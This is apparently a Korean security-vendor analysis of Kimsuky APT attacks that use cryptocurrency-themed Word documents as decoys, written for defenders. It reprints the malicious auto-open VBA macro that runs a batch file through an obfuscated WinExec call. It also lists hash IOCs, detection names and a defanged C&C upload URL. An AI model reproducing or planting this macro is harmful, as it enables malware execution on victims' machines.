코인관련 내용의 워드문서를 이용한 APT 공격 (Kimsuky)

ASEC 분석팀은 3월 21일 Kimsuky 그룹이 코인관련 내용의 워드문서로 APT 공격을 수행중인 것을 확인하였다. 공격에 사용된 미끼 문서는 총 3건이 확인되었으며 매크로 제작자 및 동작방식은 지난 3월 14일에 ASEC 블로그에 게시한 내용(제목: 제품소개서로 위장한 악성 워드 문서)과 동일하다. 3건 모두 정상적으로 작성된 워드문서를 바탕으로 악의적 매크로 코드를 추가하여 배포한 것으로 추정되며, 내용은 모두 가상화폐와 관련되어있어 코인업체를 타겟으로 한 공격으로 추정된다. 문서를 수정한 사람은 Acer 이름으로 동일하며, 모두 3월 21일 오전에 수정되어 최근 공격에 이용될 가능성이 높아 각별한 주의가 요구된다.

  • 주주물량관련.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 10:29)
  • 자산부채현황.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 11:10)
  • 제 3차 정기총회.doc (수정한 사람: Acer, 수정날짜: 2022-03-21 11:03)
[그림 1] 주주물량관련.doc
[그림 2] 자산부채현황.doc
[그림 3] 제 3차 정기총회.doc
[그림 4] 코인 관련 문서 (제작날짜 : 03/17)
[그림 5] 문서 최종 수정 시간 비교 (좌측부터 문서 제목 : 자산부채현황.doc, 제 3자 정기총회.doc, 주주물량관련.doc)

확보된 3개 문서 모두 동일한 매크로를 사용하였으며 지난 블로그에서 소개한 temp.doc 매크로 코드와 기능이 일치하였다.

  • 기능 : “C:\Users\Public\Documents\no1.bat” 파일 실행
Private Declare PtrSafe Function NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long

Sub Document_Open()
   NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp "C:\Users\Public\Documents\no1.bat", 0
End Sub

“no1.bat” 파일을 생성하는 주체는 수집된 문서 파일이 아닌 다른 문서에 의해 생성된 것으로 추정된다. 이는 지난 블로그에서 언급하였듯이 아래 [그림 6]처럼 매크로 사용 버튼 클릭을 유도하는 문서의 매크로에 의해 생성된 것으로 보인다.

[그림 6] 매크로 사용 버튼 클릭을 유도 최초 악성 문서

결과적으로 제품소개서로 위장한 악성 워드 문서의 유포 방식과 이번 사례의 유포 및 동작 방식은 완전히 일치하였다. 따라서 해당 공격 그룹은 현재 물류, 쇼핑 뿐만 아니라 가상자산 사업자에도 공격을 수행하고 있는 것으로 보인다.

사용자는 출처가 불분명한 워드 파일 실행 시 [그림 6]와 같은 문구가 확인될 경우 악성 워드 문서일 가능성이 있으므로 “콘텐츠 사용” 버튼을 클릭하는 데 각별한 주의가 필요하다.

현재 안랩 V3 제품에서는 이와 같은 공격에 대해 지속적으로 모니터링 중에 있으며 다음 진단명으로 대응하고있다.

[IOC]
[MD5]
– cloudy.bat : 0ecc9a4cea5c289732c76234c47a60e9
– download.vbs : 82ed73e4adbe5c26bafb5072657fd46b
– no4.bat : 7a2f350a2a6aa1d065c2b19be6dc6fb4
– start.vbs : 8a2eeafca1b33010d7ed812cf17d42f5
– upload.vbs : 869f98aac4963c7db7276d2a914d081e
– 자산부채현황.doc : a872dbb06e2dc721f180d05e2c1c8c20
– 제 3차 정기총회.doc : 56a936b9b3a3bdafed40cf5d056febaf
– 주주물량관련.doc : dc0223fb97891a90049d0c0d2beeb756

[진단명(엔진버전)]
– cloudy.bat : Trojan/VBS.Akdoor (2022.03.23.00)
– download.vbs : Downloader/VBS.Generic (2022.03.23.00)
– no4.bat : Trojan/BAT.Agent (2022.03.23.00)
– start.vbs : Trojan/VBS.Akdoor (2022.03.23.00)
– upload.vbs : Trojan/VBS.Akdoor (2022.03.23.00)
– 자산부채현황.doc : Trojan/DOC.Agent (2022.03.23.00)
– 제 3차 정기총회.doc :Trojan/DOC.Agent (2022.03.23.00)
– 주주물량관련.doc :Trojan/DOC.Agent (2022.03.23.00)

[C&C]
– hxxp://sysrtri-man.com/upl11/upload.php

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:, ,

5 1 vote
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments